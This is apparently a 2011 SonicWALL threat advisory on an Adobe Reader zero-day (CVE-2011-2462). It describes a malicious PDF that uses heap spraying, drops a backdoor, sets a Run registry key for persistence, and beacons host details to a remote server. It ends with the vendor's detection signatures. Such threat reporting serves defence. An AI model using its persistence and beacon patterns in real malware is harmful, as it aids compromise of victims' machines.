Adobe Reader and Acrobat Zero Day exploit (Dec 9, 2011)
SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2011-2462) in Adobe Reader and Acrobat affecting Windows, Mac OS X, and Unix operating systems. This U3D memory corruption vulnerability (CVE-2011-2462) could lead to application crash, and may potentially allow the attacker to gain control of the victim machine. Adobe issued a security advisory on December 6, 2011 warning the users about this flaw.
SonicWALL UTM Research team got hold of a zero-day exploit for this vulnerability in the wild which is a specially crafted PDF file containing malicious encoded JavaScript and malicious U3D object. The exploit may arrive via e-mail or can be served via a malicious drive-by site.
A code snippet from decoded version of JavaScript that performs heap spray and drops a malicious executable file onto the target machine can be seen below:
The malicious PDF file when opened performs the following activity on victim machine:
- Encoded JavaScript uses heap spraying technique to crash the application and redirect to second document page as seen below.
- It drops a backdoor Trojan on the target machine and runs it:
- (USER)Local Settingspretty.exe — Detected as GAV: Wisp.A_2 (Trojan)
- Creates a registry entry to ensure that the backdoor Trojan runs on system reboot:
- HKCUSoftwareMicrosoftWindowsCurrentVersionRunoffice = “(USER)Local Settingspretty.exe”
- The dropped backdoor Trojan will further attempt to connect to a remote server prettyli(REMOVED)com and sends following requests:
- GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
- GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
SonicWALL UTM appliance provides protection against this threat via the following signatures:
- GAV: CVE-2011-2462.A (Exploit)
- IPS: Malformed PDF File 14b
